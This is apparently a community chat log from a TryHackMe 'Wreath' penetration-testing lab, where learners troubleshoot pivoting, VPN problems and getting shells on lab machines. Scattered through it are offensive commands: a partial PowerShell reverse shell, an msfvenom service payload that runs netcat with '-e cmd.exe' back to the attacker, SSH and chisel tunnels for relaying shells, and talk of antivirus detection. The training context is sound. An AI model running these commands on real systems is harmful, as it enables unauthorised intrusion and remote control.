yeah. Guess I'll get some curl practice in, converting python to curl commands and doing it the old fashioned way 🤷‍♂️

Np 🙂

Heh, it's good practice at least

God knows what's happening with the exploit though

yeah, that's just odd. I even tried python2 <exploit.py>, same issue

it's like python is being excluded from the sshuttle connection

Quick question

You did change the IP, yes?

42

yep

Just double check that's right?

okay, that's even weirder. I'm wondering if maybe it was a line encoding issue. The number was correct, but just for giggles, I pasted the IP in from my curl command, instead of manually typing it like before. Worked right away.

and I did do the dos2unix earlier

Yeah, quite possible

Gotta love computers

indeed. But hey, at least I don't have to manually do a bunch of curl now 🙂

Yep 😆

you're just a good luck charm, I s'pose

Ahaha, I wish

Right. Bed time, methinks

sleep well

thanks again

Np 😄

Anyone else getting 404 when downloading the connection pack to the network ?

Hello World!

I need some help, as I'm stuck and I've been stuck for a few hours and I can't get out of this step.
In the last part,Task 20, when I run :powershell.exe -c "$client = New-Object System.Net.Socke............... "http://127.0.0.1:8008/web/......." I just get a ""

I have my nc listening but I don't get the PS c:

what am I doing wrong?

Thanks.

Sorry, with the last reset, I did not make the port permanent.

ssh: connect to host 10.200.106.200 port 22: No route to host

A question about Task #19: the exploit works but i wanted to try the same using curl but I think the quotes aren't handled correctly or I have another mistake in formatting:
||
curl --socks5 127.0.0.1:11337 -X POST http://10.200.87.150/rest/user/ -H "Content-Type: application/json" -d '{"username" : "SefD", "password" : "trO1oViwochl60sADlTU"}'
'Key 'username' not found in <QueryDict: {u'{"username" : "SefD", "password" : "trO1oViwochl60sADlTU"}': [u'']}>' ||
any1 know where's the error?

10.200.81.200 up & runnig again this morning thanks!

Task 32: I don't get any output from the PowerShell script. Does anyone have any advice for me?

@surreal sail I'm surprised that's not erroring out actually

You need to initialise it first

i am not able to ping the ip address

i regenerate the vpn file then also

??

thx. for the hint, i have done it, but the same result. :/

Try:

Invoke-Portscan.ps1
Get-Help Invoke-Portscan```

Oh, did you upload the script rather than using the -s switch @surreal sail?

Get-Help could not find Invoke-Portscan.ps1

i have try both :)

So do it with -s then try the commands I just gave you in order

ok

hey muiri!

Did u submitted the report man?

I have kinda made a small typo mistake in the report that i submitted...... can I submit it again and remove the link for the previous one?

my fault, i have to use: Get-Help Invoke-Portscan not Get-Help Invoke-Portscan.ps1 thx.!!!

yep

I submitted yesterday

Oh noice

Yep, go for it :)

thank you so much!

I can reject the first one for you

PowerShell and I will not become friends xD

It was just one word typo and I realised it rn

It happens

Thanks man

Np 🙂
Just rejecting the old one now

I have problems with the connection from yesterday

I cant reach anything

My friend also has the same problem with vpn config and the ping @merry robin

We reset the network yesterday but its bot working know

.112 subnet

Was it working after the reset @rapid turret?

They are not able to connect to ssh and also they are not getting any ping results

Same subnet @crude drift?

Yes

I changed my subnet and its working know

Thanks a lot muiri! Just submitted the corrected writeup!

@lilac jasper come and share ur issue man

I was gonna say, make sure that the network is actually started, but that works too 🤷‍♂️

Mine is properly working but my friend don't get a ping even after regenerating and downloading the vpn file

Regenerating the config is unlikely to do anything.

Much more likely that either the network is asleep or 200 is down

I'm getting a panel on the site so I can check that, soon, but it's not implemented yet so for the time being I have as much information as you lot 🤷‍♂️

If the network is saying active but you can't access the machine, go for a reset

Hmm ok man I will let them know

They have the problem of this #wreath-network message

yeah i checked that but still not working

the thm vpn is working

Go for a reset then

did

If it's not working immediately after a reset then it's something at your end

okay

but then how thm comman vpn is working sir ??

Hi

10.200.81.200 not reachable!

up

working

Hey @merry robin may I DM you about ||the "passwdfile" on git-serv?||

Aye, sure

hey guys, could you please help me with ssh forwarding reverse shell from ||gitstack (TARGET) to attacking box (ATCK) through the webserver (JUMP)||?

I combined approach from the THM-Wreath room with https://www.ired.team/offensive-security/lateral-movement/ssh-tunnelling-port-forwarding.

On ATCK:
I have created a new pair of keys, edited authorized_keys exactly as the room said.

I have ||put private id_rsa key for forwarding into the JUMP||. Then I set up a nc -nvlp 443 (tried both with and without -e /bin/bash) and ||set SSH forwarding for high number port on JUMP to ATCK. The syntax was: ssh -L 19999:ATCK:443 root@ATCK -N -f||. Succesfully connected:
Authenticated to ATTCK ([ATTCK]:22).
debug1: Local connections to LOCALHOST:19999 forwarded to remote address ATTCK:443

3. set a 19999 to be allowed by firewall on JUMP (firewall-cmd --zone=public --add-port 19999/tcp as stated in the room) and used ||in Burpsuite: "a=powershell reverse shell" from the room, url-encoded, that used 'JUMP',19999 IP,PORT. JUMP ssh tunnel, which should forward it to ATCK set NC listener according to all manuals.||

But I can't get it to work, what I am doing wrong, please?
Any help would be much appreciated, even if you did it differently than ssh (I try to avoid using static binaries on JUMP tho)

┌──(rootDESKTOP-7K6I4IF)-[~/Documents/Wreath]
└─# sshuttle -r root@10.200.106.200 10.200.106.150/12 --ssh-cmd "ssh -i id_rsa" -x 10.200.106.200
c : Connected to server.

Warning: iptables-legacy tables present, use iptables-legacy to see them

iptables v1.8.7 (nf_tables): CHAIN_ADD failed (No such file or directory): chain OUTPUT

Warning: iptables-legacy tables present, use iptables-legacy to see them

iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/python3', '/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99

can someone help me with this ??

Is that WSL? 1 or 2?

@ancient harbor are you able to connect to 19999 from your attacking machine?

What happens if you do nc JUMP 19999 from ATCK?

seems not

nc ATTCK 19999
(UNKNOWN) [ATTCK] 19999 (?) : Connection refused

Oh, I know what's happening there

Kill the SSH job and specify to listen on 0.0.0.0:19999

They listen on 127.0.0.1 by default

@lilac jasper Is that WSL? 1 or 2?

nice, how would the syntax look like for that?
||ssh -L 0.0.0.0:19999:ATTCK:443 root@ATCK -Nfv||

Yep, that looks good to me

Good use of SSH btw!

So, this doesn't look like it

debug1: Local connections to 0.0.0.0:19999 forwarded to remote address ATTCK:443
debug1: Local forwarding listening on 0.0.0.0 port 19999.

when I try nc from ATTCK to JUMP:19999, same issue:
nc JUMP 19999
(UNKNOWN) [JUMP] 19999 (?) : Connection refused

Use netcat on the attacking machine to connect to 19999 on the Jump?

Yeah, this connection refused is it
... but maybe it's because of the firewall rule on port 19999 set to --zone=public?

sorry, corrected that IP

Lemme see if I can get this working

Great, thank you so much!

2

.../12?

WSL 2

Are you not routing 10.200.106.0/24 through sshuttle?

i am

but still same prob

[FWIW, the network stopped in-between my testing, I started it again, but can't connect anymore into JUMP (ping, ssh, nmap... all say no route to host)]

same prob wait for few min and start again

not able to ping also know @ancient harbor ??

@strange bison

┌──(root💀DESKTOP-7K6I4IF)-[~/Documents/Wreath]
└─# sshuttle -r root@10.200.106.200 --ssh-cmd "ssh -i id_rsa" 10.200.106.150/24 -x 10.200.106.200
c : Connected to server.

Warning: iptables-legacy tables present, use iptables-legacy to see them

iptables v1.8.7 (nf_tables): CHAIN_ADD failed (No such file or directory): chain OUTPUT

Warning: iptables-legacy tables present, use iptables-legacy to see them

iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/python3', '/usr/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99

yeah unfortunately Destination Host Unreachable, even after a few minutes. But not in rush, may try after a restart or so

yeah

it happened with me also if you read above chats

@ancient harbor Apologies -- needed to get my dev network reset.

So, it's to do with a setting in the sshd_config called GatewayPorts. If that's disabled (which it is by default), then SSH won't bind to anything that isn't a loopback address

Meaning you have a choice between changing the SSH config, or uploading a static binary

Absolutely no problem, thank you for helping and also the amazing room (one of the best out there, really)!

So if I change the sshd_config, ||which is fine with root acc anyway||, the method works?
To explain, I don't really like static binaries because of the AVs - ||not that it would be on the JUMP box, anyway, but|| it's the same for me as meterpreter/metasploit - I never use it not to get used to it. Not that root ssh connections, firewall and sshd config changes are that much stealthier ofc 🙂

I have one more question if you'd be willing to answer (and it's ok if not) - would it be possible to set a port fwd/NAT rule (iptables, like the sshuttle uses) instead of ssh tunnel ||- on the JUMP to forward the reverse shell from gitstack/TARGET||?

It would, although given the fact the network is shared, I would prefer you didn't 😆

I meant for one of the high ports on specific address, but I get you 😄 iptables are finnicky at best from the limited testing I did on them

@merry robin sir can you explain me this error??

So anyway, many thanks for the help again and hopefully be seeing more amazing rooms like this from you! 🙂

Looks like a host issue. Are you on WSL by any mischance?

yes WSL 2

That should be fine then if you wanna experiment. Just be aware that firewalld as a wrapper around iptables may be a little less happy

I have the same problem since yesterday, cant download the ovpn config file for wreath network, gave me a 302 bad gateway or 404 not found

@merry robin Yea, I thought so. But this syntax should deal with that, right?

firewall-cmd [--zone=<zone>] --add-forward-port=port=<port>[-<port>]:proto=<protocol> {:toport=<port>[-<port>]|:toaddr=<address> |:toport=<port>[-<port>]:toaddr=<address> }

i can download the vpn config file for room tough, it's only the one specific to wreath network that gave me error

It's not something I've tried with firewalld @ancient harbor. Give it a shot to see though!

yup, so thanks again!

cant install the wreath network vpn i am confused

Can you show a screenshot instead?

it just redirects to 404 page when i try to install the wreath network vpn

@fiery ingot this seems to be happening really frequently -- any ideas?

hi all this is my first post in this room and in general on tryhackme...

i am doing this room and for fun trying nmap via proxychain

i have olways socket error or timeaout

yeah i can take a look - what subnet are you on?

what i have done is:

ssh -D 15700 root@10.200.97.200 -fN -i idrsa

so i have the tunnel

then set proxychains.con

and proxychain nmap -Pn -n -St 10.200.97.0/24

sorry form my bad english be patient

i am doing something wrong ?

this is my ip 10.50.98.8

Hello, when copying the wrapper with SMB to the %TEMP% directory i am getting copy : Could not find a part of the path 'C:\%TEMP%\... , do not know if I am doing something wrong or the %TEMP% directory should be created and it is not written in the section. Anyway I've used another directory.

Nmap and proxychains does NOT work well

Muiri — 03/28/2021
@pale seal you're in my dev subnet for a start. Try leaving, rejoining, then redownloading the config pack

Shall i do the same as above?

TASK42: Are msfvenom executables picked up by the windows antivirus? I am trying to create a service using this command ||msfvenom -p windows/exec CMD="c:\windows\temp\nc-Username.exe IP PORT -e cmd.exe" -f exe-service -o exec.exe ||, if i run the command in by itself it works fine and i get a shell, but if i try to execute it by restarting the service i do not get a shell and also i get the error The executable program that this service is configured to run in does not implement the service., which is strange since the filetype specified in msfvenom is exe-service... Also i've tried getting a reverse shell using the payload windows/shell/reverse_tcp and the proper parameters but had no luck. The C# wrapper works fine.

Even defender should be picking up anything msfvenom

It's a hopeless AV, but if that works I'd be amazed

Oh ok thank you 🙂

Is really defender working? Winpeas says that no AV was detected, or maybe winpeas says consideres defender as having no AV which is kinda fun

There's a chance some twit disabled it, yes

You won't have access to reboot it, so if you want me to take a look you'll need to disconnect from the VPN and DM me the config I'm afraid

Im getting a connection reset error in firefox for task 33. ||I have a sshuttle proxy going in the network and a chisel forward proxy set up and connected. I'm using foxy proxy to navigate my traffic through chisel and firefox says the connection was reset. I have also configured the firewall rule to allow traffic on the windows machine||.

Show me your FoxyProxy settings?

ooo I think I know this one

@merry robin You wanna get this or can I?

What type of proxy did you start with chisel?

@strange bison a forward proxy as recommended in the task.

on the target || .\chisel-chekn8.exe server -p 46000 --socks5||
and on my end || client 10.200.98.150:46000 10000:socks||

Anyone working on this now?

I can't seem to do an nmap scan

So you started a socks5 proxy. In foxyproxy, you have it set as a HTTP proxy.

Should've caught that one. Its loading now. Thanks!

why does it say i only have 9 days of access left?

When you join the room, you get 10 days of access.

and if you want more than 10 days?

You can rejoin after those days of access, it's a way of avoiding inactive people taking up slots in networks.

ahhh ok ty

Need help on task 20 getting a || proper shell || on the ||gitstack|| using socat, my payload is not working, i have tried multiple other payloads and methods. i have also tried listening on netcat and have still recieved no connections. || commands like dir and whoami|| execute fine and yes i have specified the ports i will be making connections to with the firewall cmd. help is appreciated 🙂

@next imp Are you able to connect to port 30123 from your attacking machine?

hold on i shouldve tried that giving it a shot rn

i have a proxy server on 9001

As in, does anything come through if you do nc 10.200.83.200 30123 To clarify

my local port

giving it a shot

yup @merry robin

not sure what the issue im experiencing is

Okay, so that would indicate your reverse shell is wrong

ive gone through a selection of shells, including the one on the task

ill try again, but mabye its my curl command or something?

am i supposed to be using proxychains to access the gitstack server?

Yeah, that's weird. The shell looks Okay

Not decoded it though obviously. Just check it over for typos

I wouldn't, personally, given you could be using sshuttle

does sshuttle open an iface?

im gon stop being lazy and google

It does it through firewall rules, but it's basically a mono-directional VPN

oh wow cool

thatd make life easier

Yep -- no need for proxying software. It lets you just access the IPs normally

Awesome tool

I downloaded the vpn configuration file, it work now ty!

the ssh port on my network has been closed for 2 days

help

is that network dead?

You shouldn't need -Pn for the initial box.

it's just closed

well on that network at least

@strange bison for some reason can only see the port is open from the attack box????

If you have the attackbox running, that autoconnects to the Wreath VPN

You can't have the attackbox running AND your own VM connected to wreath

@strange bison ya but using the username-wreath.ovpn just returns the port as filtered or closed

Ok, but if the attackbox is running then you basically have multivpn

it was filtered before started the attack box

@strange bison scan from my machine = closed/filtered
scan from attack machine = open
even after network rest
and even after trying to remake the ovpn conf file

So you're not connected properly then

I can connect to other single room machines just fine, just not Wreath

The listener issue should be resolved now. Let us know if 3.8.2 is still having a problem so we can be sure to check it out.

it now works I have no idea

@strange bison thanks

I mean that's a different config file so...

5 seconds later it's filtered again...

Going to use the attack box I give up

You should not be using -Pn

And you CANNOT have the attackbox running at the same time.
Your VPN connection is unstable. Usually that's MultiVPN.

Sure don't use more than one VPN connection. But how come it doesn't seem to work with one outside of the attack box?

I can't see the output of your VPN command so I don't stand a chance of diagnosing it from here.
The attackbox uses your wreath & throwback profiles automatically if you are a subscriber and have access to any networks.
This will break any other connection to Wreath or Throwback that you have.

well it works for 85.0/24 network 92.0/24 didn't work at all for 2 days and with attack box or kali box not turned on

After exploiting the web server, I can't get the reverse shell to work even though it worked yesterday

Was anyone able to solve problem with config file being downloaded as a html page instead of openVPN file? (Wreath network)

Ashu is looking into it @viscid flame 🙂

What subnet are you on?

I see only 10.200.71.200 computer

On the graph

Ah, 71

Leave and rejoin the room please @viscid flame 🙂

hey, I reach Task - 6 (Exploitation) and also found id_rsa ssh private key but the id_rsa file is empty

is something wrong with the file?

Muiri do you accept writeups for the network?

Welp. Why is my openvpn file downloading as a HTML file? This seems to be my issue as well. Same IP 10.200.71.200. I've left and rejoined a couple of times, still same HTML file.

Have a look at Task 44

@limber rover looks like you might need to move manually?

Someone is trolling and has deleted the key. Please disconnect and DM me the openvpn config file

Have a look at Task 44
@merry robin so there SHOULD be a written report with a link to the video at the end of it ? Or just the video is ok ?

@merry robin done

In terms of actual writeups being accepted on the room, yes, a written report (as if it were a pentest), but with a link to a video at the end if you have one 🙂

Moved - this bug is next on my list of to-dos to fix:)

Thanks 😄

I need a clarification